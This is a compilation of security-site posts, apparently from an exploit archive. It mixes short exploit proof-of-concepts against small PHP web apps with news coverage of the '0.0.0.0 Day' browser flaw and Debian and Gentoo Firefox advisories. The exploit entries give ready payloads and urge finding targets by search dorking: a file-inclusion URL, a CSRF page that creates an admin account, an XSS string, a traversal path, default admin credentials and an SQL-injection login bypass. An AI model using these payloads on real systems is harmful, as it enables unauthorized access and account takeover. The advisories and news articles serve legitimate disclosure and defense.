Farmacia Gama version 1.0 suffers from a file inclusion vulnerability.

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 File inclusion Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?id=1&pg=[+] http://127.0.0.1/farmacia-master/main.php?id=1&pg=http://127.0.0.1/phpMyAdmin/themes/pmahomme/img/logo_left.pngGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Farmacia Gama 1.0 File Inclusion 

Employee Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Employee Management System v1.0 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/16999/employee-management-system.html                                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] infected file : employee_akpoly/Admin/add-admin.php.

[+] http://127.0.0.1/employee_akpoly/Admin/add-admin.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Add Admin</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/employee_akpoly/Admin/add-admin.php" method="POST" enctype="multipart/form-data">  
        <label for="txtusername">Username:</label>  
        <input type="text" id="txtusername" name="txtusername" required><br><br>

        <label for="txtfullname">Full Name:</label>  
        <input type="text" id="txtfullname" name="txtfullname" required><br><br>

        <label for="txtpassword">Password:</label>  
        <input type="password" id="txtpassword" name="txtpassword" required><br><br>

        <label for="txtphone">Phone Number:</label>  
        <input type="text" id="txtphone" name="txtphone" required><br><br>

        <label for="avatar">Avatar:</label>  
        <input type="file" id="avatar" name="avatar" accept="image/*"><br><br>

        <button type="submit" name="btncreate">Create</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Employee Management System 1.0 Cross Site Request Forgery

E-Commerce Site using PHP PDO version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : E-Commerce Site using PHP PDO v1.0 XSS Vulnerability                                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/12287/e-commerce-site-using-php-pdo.html                                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>[+] https://www/127.0.0.1/demo/ips-lb.net/index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

E-Commerce Site Using PHP PDO 1.0 Cross Site Scripting

Attackers can use a seemingly innocuous IP address to exploit localhost APIs to conduct a range of malicious activity, including unauthorized access to user data and the delivery of malware.

Source: Tada Images via Shutterstock

Attackers can use a flaw that exploits the 0.0.0.0 IP address to remotely execute code on various Web browsers — Chrome, Safari, Firefox, and others — putting users at risk for data theft, malware, and other malicious activity.

Researchers at open source security firm Oligo Security have discovered a way to bypass browser security and interact with services running on an organization's local network from outside the network, that they are calling "0.0.0.0 Day," because of the Web address it exploits.

The vulnerability exists due to "the inconsistent implementation of security mechanisms across different browsers, along with a lack of standardization in the browser industry," Avi Lumesky, an Oligo AI security researcher, revealed in a blog post published this week.

Attackers can use the flaw to exploit localhost application programming interfaces (APIs) from the browser, thus performing a range of malicious activities.

"As a result, the seemingly innocuous IP address, 0.0.0.0, can become a powerful tool for attackers to exploit local services, including those used for development, operating systems, and even internal networks," Lumesky wrote.

**Breaking Down the Flaw**

The flaw lies in the ability by design of browsers for services to send a request to almost any HTTP server using JavaScript; a browser's key job is to focus on delivering the correct response, either by serving up a valid response to a request or an error.

While browsers are generally supposed to prevent errant or malicious requests from getting through via their responses, there has been a lack of streamlined security in handling requests across browsers since their inception.

"For a long time, it was not clear how browsers should behave when they make requests to local or internal networks from less-private contexts," Lumesky explained in the post.

While most browsers have relied on CORS, or Cross-Origin Resource Sharing — a standard defining a way for client Web applications that are loaded in one domain to interact with resources in a different domain — "its performance depends on the response content, so requests are still made and can still be sent," Lumesky noted.

"This is simply not good enough," he wrote. "History proved that a single HTTP request can attack a home router — and if that's all it takes, every user needs to be able to prevent this request from happening at all."

**PNA Bypass**

Chrome's introduction of Private Network Access (PNA) — which goes beyond CORS — should, in theory, protect websites from the 0.0.0.0 day bug. PNA proposes distinguishing between public, private, and local networks, ensuring that "pages loaded under a less-secure context will not be able to communicate with more-secure contexts," Lumesky wrote.

However, Oligo researchers discovered that website requests sent to 0.0.0.0, which should be blocked under PNA, were actually received and processed by local servers. "This means public websites can access any open port on your host without the ability to see the response," Lumesky wrote.

To prove their point, the attackers investigated how ShadowRay, a recent attack campaign its researchers discovered targeting AI workloads, could execute its attack from the browser using 0.0.0.0 as its attack vector.

ShadowRay enabled arbitrary code execution when a private server was unintentionally exposed to the Internet, and went undiscovered for nearly a year. To prove their concept, Oligo researchers ran a local Ray cluster on localhost, then started a socket that is listening to new connections to open a reverse shell.

"Then, the victim clicks on the link in the email, which runs the exploit," Lumesky explained. "The exploit opens a reverse shell for the attacker on the visitor’s machine."

The researchers proved the concept within Chromium, Safari, and Firefox to execute ShadowRay from the browser in "one of an undoubtedly huge number of remote code execution attacks enabled by this approach," Lumesky noted. They also proved the attack via Selenium Grid public servers and PyTorch TorchServe via respective previously identified attack campaigns SeleniumGreed and ShellTorch.

Ultimately, the researchers demonstrated how by using 0.0.0.0 together with mode "no-cors," attackers "can use public domains to attack services running on localhost and even gain arbitrary code execution, all using a single HTTP request," Lumeksy explained.

**How Defenders Can Mitigate Attacks**

Oligo disclosed the findings to the relevant browser owners — including Google, Apple, and Mozilla — which responded by making fixes in their browsers to block 0.0.0.0 as a target IP, according to Oligo.

Meanwhile, as the companies in charge work to streamline security standards across browser offerings, there are other technical mitigations that network administrators can use to thwart attacks using the vector, Lumesky said.

They include implementing PNA headers, verifying the HOST header of the network request to protect against DNS rebinding attacks to localhost or 127.0.0.1, and generally mistrusting localhost networks just because they are "local." "Add a minimal layer of authorization, even when running on localhost," he advised.

Network administrators should also use HTTPS over HTTP whenever possible and implement CSRF tokens in your applications, even if they are local.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

'0.0.0.0 Day' Flaw Puts Chrome, Firefox, Mozilla Browsers at RCE Risk

Cybersecurity researchers have discovered a new "0.0.0.0 Day" impacting all major web browsers that malicious websites could take advantage of to breach local networks.
The critical vulnerability "exposes a fundamental flaw in how browsers handle network requests, potentially granting malicious actors access to sensitive services running on local devices," Oligo Security researcher Avi Lumelsky

Vulnerability / Browser Security

Cybersecurity researchers have discovered a new "0.0.0.0 Day" impacting all major web browsers that malicious websites could take advantage of to breach local networks.

The critical vulnerability "exposes a fundamental flaw in how browsers handle network requests, potentially granting malicious actors access to sensitive services running on local devices," Oligo Security researcher Avi Lumelsky said.

The Israeli application security company said the implications of the vulnerability are far-reaching, and that it stems from the inconsistent implementation of security mechanisms and a lack of standardization across different browsers.

As a result, a seemingly harmless IP address such as 0.0.0.0 could be weaponized to exploit local services, resulting in unauthorized access and remote code execution by attackers outside the network. The loophole is said to have been around since 2006.

0.0.0.0 Day impacts Google Chrome/Chromium, Mozilla Firefox, and Apple Safari that enables external websites to communicate with software that runs locally on MacOS and Linux. It does not affect Windows devices as Microsoft blocks the IP address at the operating system level.

Particularly, Oligo Security found that public websites using domains ending in ".com" are able to communicate with services running on the local network and execute arbitrary code on the visitor's host by using the address 0.0.0.0 as opposed to localhost/127.0.0.1.

It's also a bypass of Private Network Access (PNA), which is designed to prohibit public websites from directly accessing endpoints located within private networks.

Any application that runs on localhost and can be reached via 0.0.0.0 is likely susceptible to remote code execution, including local Selenium Grid instances by dispatching a POST request to 0.0.0\[.\]0:4444 with a crafted payload.

In response to the findings in April 2024, web browsers are expected to block access to 0.0.0.0 completely, thereby deprecating direct access to private network endpoints from public websites.

"When services use localhost, they assume a constrained environment," Lumelsky said. "This assumption, which can (as in the case of this vulnerability) be faulty, results in insecure server implementations."

"By using 0.0.0.0 together with mode 'no-cors,' attackers can use public domains to attack services running on localhost and even gain arbitrary code execution (RCE), all using a single HTTP request."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

0.0.0.0 Day: 18-Year-Old Browser Vulnerability Impacts MacOS and Linux Devices

Debian Linux Security Advisory 5740-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, the bypass of sandbox restrictions or an information leak.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5740-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 07, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2024-7519 CVE-2024-7521 CVE-2024-7522 CVE-2024-7524   
                 CVE-2024-7525 CVE-2024-7526 CVE-2024-7527 CVE-2024-7529   
                 CVE-2024-7531

Multiple security issues have been found in the Mozilla Firefox web  
browser, which could potentially result in the execution of arbitrary  
code, the bypass of sandbox restrictions or an information leak.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 115.14.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 115.14.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmazJNEACgkQEMKTtsN8  
Tjbc0A/+ND/PqMdzy6m7syWycmZMYbI+i19RSJHC75rwT3MgVB0U8WkRD1EPe7Uw  
IAYoOJ2zzE8FkgjEgQBwv7S3krhl888NgbRtyFZAX41UjyoZZ4q2T+N0h9DICPcb  
EcuaJCrvai4AsVIK2MXzBza8he1emof0tqXTFTyDpZtiui6fW7sEDL/4TPbaU/+7  
MlM7fjtPnCOBrkxGY7dpnfLX3AlFsbxcpe2cRnCQ/CoAGTJ2/grCGucgFLPHDSut  
rnTXWMzT0H1iXXdEJ688Nl6D50+nNmovzoyCTw3ZGsB/fSAUiFM0Lp0Ct31uLy5l  
uLT4hOEgM1FZGkEmf0mW4Ugwajv161o4uTLJMViai3MGNw+A5G040yAgdgn4ohQn  
Ew1o+im9qLw+pimte8OpixYzJHWw4KPouzJH7SZrlLTilrhDlC22EKE9F6jD0QF2  
9ay/pEbkF6AT4HSgguUzb/6DR21sjkM4x70P6cNYJO6Jak+IMtG4Qp35YIsdO9cn  
0W/nWz5FjtlwvQrCusQ49JM/N23TlFsB2y2+NfCADZb6Q4OkGhRLB9mtdZQUXWOT  
JgsYj9/+pNNkkHQcllPGgSXbtddyxE0OMehN2eWrN/kjcIS6XwxI0j+8eZbY5fcM  
yVdgH2foNnvtPnKCTT3qdq2poLCkvVFNrAyMKCXwkOxTZ1FY5fg=  
=i/4D  
-----END PGP SIGNATURE-----

Debian Security Advisory 5740-1

E-Commerce Site using PHP PDO version 1.0 suffers from a directory traversal vulnerability.

    =============================================================================================================================================| # Title     : E-Commerce Site using PHP PDO v1.0 Directory traversal Vulnerability                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/12287/e-commerce-site-using-php-pdo.html                                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /bower_components/bootstrap/dist/css/../../Gemfile[+] https://www/127.0.0.1/demo/site/loginGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

E-Commerce Site Using PHP PDO 1.0 Directory Traversal

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

Posted Aug 7, 2024

Authored by indoushka

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 8c38f4e680e6513d62d4303a51a4d7e3eaa5a7bb80e3e87ce8e510bba268a0b9

Download | Favorite | View

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Covid-19 Directory on Vaccination System v1.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,289)
*   Arbitrary (16,852)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,792)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,386)
*   DoS (25,050)
*   Encryption (2,389)
*   Exploit (53,137)
*   File Inclusion (4,259)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,889)
*   Intrusion Detection (915)
*   Java (3,143)
*   JavaScript (896)
*   Kernel (7,191)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,167)
*   Perl (1,435)
*   PHP (5,222)
*   Proof of Concept (2,382)
*   Protocol (3,724)
*   Python (1,635)
*   Remote (31,646)
*   Root (3,635)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,605)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,941)
*   Web (9,960)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,090)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,547)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,646)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,459)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,729)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,670)
*   Other

Covid-19 Directory On Vaccination System 1.0 Insecure Settings

Gentoo Linux Security Advisory 202408-2 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could lead to remote code execution. Versions greater than or equal to 115.12.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: August 06, 2024  
     Bugs: #930380, #932374, #935550  
       ID: 202408-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could lead to remote code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

Package                 Vulnerable      Unaffected  
----------------------  --------------  ---------------  
www-client/firefox      < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid  
www-client/firefox-bin  < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-127.0:rapid"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-127.0:rapid"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.12.0:esr"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.12.0:esr"

References  
==========

[ 1 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 2 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 3 ] CVE-2024-3853  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3853  
[ 4 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 5 ] CVE-2024-3855  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3855  
[ 6 ] CVE-2024-3856  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3856  
[ 7 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 8 ] CVE-2024-3858  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3858  
[ 9 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 10 ] CVE-2024-3860  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3860  
[ 11 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 12 ] CVE-2024-3862  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3862  
[ 13 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864  
[ 14 ] CVE-2024-3865  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3865  
[ 15 ] CVE-2024-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4764  
[ 16 ] CVE-2024-4765  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4765  
[ 17 ] CVE-2024-4766  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4766  
[ 18 ] CVE-2024-4771  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4771  
[ 19 ] CVE-2024-4772  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4772  
[ 20 ] CVE-2024-4773  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4773  
[ 21 ] CVE-2024-4774  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4774  
[ 22 ] CVE-2024-4775  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4775  
[ 23 ] CVE-2024-4776  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4776  
[ 24 ] CVE-2024-4778  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4778  
[ 25 ] CVE-2024-5689  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5689  
[ 26 ] CVE-2024-5693  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5693  
[ 27 ] CVE-2024-5694  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5694  
[ 28 ] CVE-2024-5695  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5695  
[ 29 ] CVE-2024-5696  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5696  
[ 30 ] CVE-2024-5697  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5697  
[ 31 ] CVE-2024-5698  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5698  
[ 32 ] CVE-2024-5699  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5699  
[ 33 ] CVE-2024-5700  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5700  
[ 34 ] CVE-2024-5701  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5701  
[ 35 ] CVE-2024-5702  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5702  
[ 36 ] MFSA-2024-25  
[ 37 ] MFSA-2024-26  
[ 38 ] MFSA-2024-28

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-02

Concert Ticket Reservation System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ======================================================================================================================================================| # Title     : Concert Ticket Reservation System v1.0 Auth By Pass Vulnerability                                                                    || # Author    : indoushka                                                                                                                            || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                     || # Vendor    : https://download-media.code-projects.org/2020/04/Concert_Ticket_Ordering_System__IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip  |======================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/ConcertTicketReservationSystem-master/profile.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#firefox